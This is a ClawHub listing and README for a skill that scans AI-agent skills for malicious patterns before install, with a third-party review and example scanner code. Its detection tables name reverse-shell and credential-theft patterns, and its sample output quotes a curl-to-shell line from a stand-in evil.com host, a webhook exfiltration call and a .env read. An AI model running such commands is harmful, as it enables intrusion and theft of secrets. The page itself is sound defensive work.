Clawhub Skill Scanner

v0.1.0

Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.


Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for amir-ag/clawhub-skill-scanner.

Install the skill "Clawhub Skill Scanner" (amir-ag/clawhub-skill-scanner) from ClawHub.
Skill page: https://clawhub.ai/amir-ag/clawhub-skill-scanner
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install clawhub-skill-scanner

ClawHub CLI

npx clawhub@latest install clawhub-skill-scanner

Security Scan

VirusTotal: Benign
OpenClaw: Benign (medium confidence)

Purpose & Capability
Name/description claim a pre-install security scanner and the package includes a Python scanner (scripts/scan_skill.py) plus documentation implementing that purpose. It does not request unrelated credentials, binaries, or configuration paths.
Instruction Scope
SKILL.md instructs the agent/user to run the included Python scanner against a skill folder and shows a wrapper that fetches a skill and scans it before install — this matches the stated purpose. Minor concerns: the doc repeatedly calls the scan 'MANDATORY' and lists triggers (e.g., 'install skill') but the skill metadata doesn't enforce mandatory execution; the wrapper script assumes clawhub inspect is available at runtime and the path to the scanner is correct. Also review the scanner's whitelist and pattern choices (e.g., some generic whitelist entries like '# ' and 'https://api.' may suppress matches in comments or API URLs).
Install Mechanism
No install spec/external downloads; code lives in the skill bundle. This minimizes supply-chain risk since nothing is fetched or executed by an automated install step in the skill itself.
Credentials
The skill requires no environment variables, credentials, or privileged config paths. The scanner looks for references to credentials in scanned code (e.g., ~/.ssh, ~/.aws, .env) which is appropriate for its purpose.
Persistence & Privilege
Skill is not marked always:true and does not request persistent privileges. The SKILL.md suggests a wrapper to run the scanner before installs, but the skill itself does not modify other skill configs or system-wide settings.
Scan Findings in Context
[pattern-definitions-included] expected: The scanner includes many regex patterns that match suspicious behavior (curl|bash, webhooks, .env files, reverse-shell patterns). This is expected for a static pattern-based scanner.
[examples-containing-dangerous-strings] expected: README/SKILL.md contain example dangerous snippets (curl | bash, webhook URLs) used to demonstrate findings. Those example strings could trigger other naive scanners but are expected here as documentation/examples.
Assessment
This skill appears to do what it says: a local pattern-based scanner you can run before installing skills. Before trusting it as your only defense: 1) Verify the scanner's source (owner and repo) and ensure you obtained the package from a trusted location — the provided metadata has no homepage and an unfamiliar owner ID. 2) Inspect scripts/scan_skill.py yourself (or in a sandbox/CI) to confirm the rule set matches your threat model and to tune whitelist/blacklist rules to avoid false positives/negatives. 3) Don't rely solely on this tool: pattern-based scanners can miss obfuscated or logic-based exfiltration and can also produce false positives; combine with manual review or runtime sandboxing for high-risk skills. 4) If you plan to integrate the wrapper into an automated install pipeline, ensure the wrapper's paths are correct and run the scanner from a controlled environment (CI or isolated host) so it cannot be tricked into scanning arbitrary system paths. If you want higher assurance, request a published repository URL or signed release for provenance — absence of a homepage/repo reduces confidence.
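
The Instruction Scope note above flags generic whitelist entries such as '# ' and 'https://api.'. The following is an added example, not code from scripts/scan_skill.py: it assumes the whitelist is applied as a per-line substring test and contrasts that with removing real comments through Python's tokenizer before matching. The regex, function names and sample source are constructed for illustration.

```python
import io
import re
import tokenize

# Hypothetical curl-pipe-shell rule; the project's own regex is not shown on the page.
CURL_PIPE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b")
# The two generic entries named in the review above.
GENERIC_WHITELIST = ("# ", "https://api.")

def naive_findings(source):
    """Assumed behaviour: skip any line that contains a whitelisted substring."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if any(entry in line for entry in GENERIC_WHITELIST):
            continue  # whole line suppressed, including any code on it
        if CURL_PIPE.search(line):
            hits.append(lineno)
    return hits

def strip_comments(source):
    """Cut real comment tokens off each line; strings and line numbers are kept."""
    lines = source.splitlines()
    try:
        for tok in tokenize.generate_tokens(io.StringIO(source).readline):
            if tok.type == tokenize.COMMENT:
                row, col = tok.start
                lines[row - 1] = lines[row - 1][:col]
    except (tokenize.TokenError, SyntaxError):
        # Untokenizable file: fail closed and scan the raw lines instead.
        return source.splitlines()
    return lines

def strict_findings(source):
    """Match on code only, with no substring whitelist."""
    return [n for n, line in enumerate(strip_comments(source), 1)
            if CURL_PIPE.search(line)]

# Constructed sample: line 2 is documentation in a comment, line 3 is live code.
SAMPLE = (
    "import os\n"
    "# docs example: curl https://get.example.invalid/install.sh | bash\n"
    "os.system('curl https://api.example.invalid/x.sh | bash')  # setup helper\n"
)

if __name__ == "__main__":
    print("substring whitelist:", naive_findings(SAMPLE))
    print("comment-aware:", strict_findings(SAMPLE))
```

A sample like this works as a regression test when tuning the rule set: the comment-only line should stay quiet and the live call should always be reported.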

Like a lobster shell, security has layers — review code before you run it.

latest: vk979r2ht93jb6rwt1rfbwxadys80n84m
1.7k downloads · 1 star · 1 version · Updated 2mo ago
v0.1.0 · MIT-0

Skill Security Audit

MANDATORY security check before installing external skills.

Inspired by the ClawHavoc campaign, which involved 341 malicious skills on ClawHub.

When to Use

Run this audit BEFORE any skill installation:

  • clawhub install <skill>
  • Manual skill download/copy
  • Skills from GitHub, URLs, or untrusted sources

Quick Start

# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill

# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json

# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe

What It Detects

🔴 CRITICAL (Blocks Installation)

| Category | Patterns |
|---|---|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl \| bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |

🟡 WARNING (Review Required)

Only patterns that are suspicious regardless of skill type:

  • Raw socket usage (unusual for most skills)
  • Dynamic code compilation
  • File/directory deletion
  • Screenshot/keyboard capture libraries
  • Low-level system calls (ctypes)

Philosophy

We intentionally don't warn on common patterns like:

  • HTTP requests (normal for API skills)
  • API key references (normal for integration skills)
  • File writes (normal for data skills)
  • Environment variable access (normal for config)

This reduces noise so real threats stand out.

Risk Scoring

CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution

| Score | Level | Action |
|---|---|---|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 | 🟡 CAUTION | Review findings |
| 51-80 | 🔶 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
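
The scoring rule and level table above, worked through on a small pattern scan. This is an added example, not the project's scan_skill.py: the regexes, function names and sample files are constructed, and clamping the total at 100 is an assumption taken from the 0-100 scale.

```python
import re

# Hypothetical rules modelled on the categories listed on this page;
# the project's real rule set lives in scripts/scan_skill.py.
CRITICAL = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"), "Curl pipe to shell"),
    (re.compile(r"discord(app)?\.com/api/webhooks/"), "Discord webhook exfiltration"),
    (re.compile(r"~/\.(ssh|aws|openclaw)\b|/\.env\b"), "Credential access"),
]
WARNING = [
    (re.compile(r"\bimport\s+ctypes\b"), "Low-level system calls (ctypes)"),
    (re.compile(r"\b(shutil\.rmtree|os\.remove)\("), "File/directory deletion"),
]
LEVELS = [(20, "SAFE"), (50, "CAUTION"), (80, "DANGER"), (100, "BLOCKED")]

def scan(files):
    """files maps name -> source text. Returns (critical, warning) finding lists."""
    crit, warn = [], []
    for name, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for bucket, rules in ((crit, CRITICAL), (warn, WARNING)):
                for rx, label in rules:
                    if rx.search(line):
                        bucket.append((name, lineno, label))
    return crit, warn

def risk_score(n_critical, n_warning):
    # CRITICAL x 30, plus WARNING x 3 with the warning share capped at 10.
    # Clamping the total to 100 is an assumption (the scale tops out at 100).
    return min(100, n_critical * 30 + min(10, n_warning * 3))

def level(score):
    """Map a 0-100 score onto the level table."""
    return next(name for top, name in LEVELS if score <= top)

# Constructed sample mirroring the three findings in the page's sample output.
SAMPLE = {
    "install.py": "import os\nos.system('curl https://evil.example/x.sh | bash')\n",
    "setup.py": "requests.post('https://discord.com/api/webhooks/000/placeholder')\n",
    "run.py": "open(os.path.expanduser('~/.clawdbot/.env'))\n",
}

if __name__ == "__main__":
    crit, warn = scan(SAMPLE)
    score = risk_score(len(crit), len(warn))
    print(f"{score}/100 {level(score)}", crit)
```

Two consequences of the formula: warnings alone contribute at most 10 and so never leave SAFE, while a single CRITICAL finding scores 30 (CAUTION), which already fails `--install-if-safe` because that flag exits 0 only on SAFE.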

Sample Output

════════════════════════════════════════════════════════════
  SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════

📊 RISK SCORE: 90/100 - 🔴 BLOCKED

🔴 CRITICAL FINDINGS (3)
  [install.py:15] Curl pipe to shell (DANGEROUS!)
    Code: os.system('curl https://evil.com/x.sh | bash')
  [setup.py:42] Discord webhook exfiltration
    Code: requests.post('https://discord.com/api/webhooks/...')
  [run.py:8] ClawdBot .env access (ClawHavoc target!)
    Code: open(os.path.expanduser('~/.clawdbot/.env'))

📁 FILES SCANNED: 5
📏 TOTAL LINES: 230

════════════════════════════════════════════════════════════
  🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════

Integration with clawhub

Create a wrapper script to auto-scan before installation:

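#!/bin/bash
# clawhub-secure: Scan before install
# The skill name is read from the second argument ($2)

SKILL="$2"
if [ -z "$SKILL" ]; then
    echo "Usage: $0 <command> <skill>" >&2
    exit 2
fi

# Private, unpredictable temp directory, removed on every exit path
TEMP="$(mktemp -d "${TMPDIR:-/tmp}/skill-audit-XXXXXX")" || exit 1
trap 'rm -rf "$TEMP"' EXIT

# Fetch without installing; stop if the fetch itself fails
if ! clawhub inspect "$SKILL" --out "$TEMP"; then
    echo "🔴 Could not fetch skill for scanning" >&2
    exit 1
fi

# Scan (exit code 0 only if SAFE)
if python3 /path/to/scan_skill.py "$TEMP" --install-if-safe; then
    clawhub install "$SKILL"
else
    echo "🔴 Installation blocked by security scan"
    exit 1
fi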

References

See references/threat-patterns.md for detailed pattern explanations.

Credits

Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.
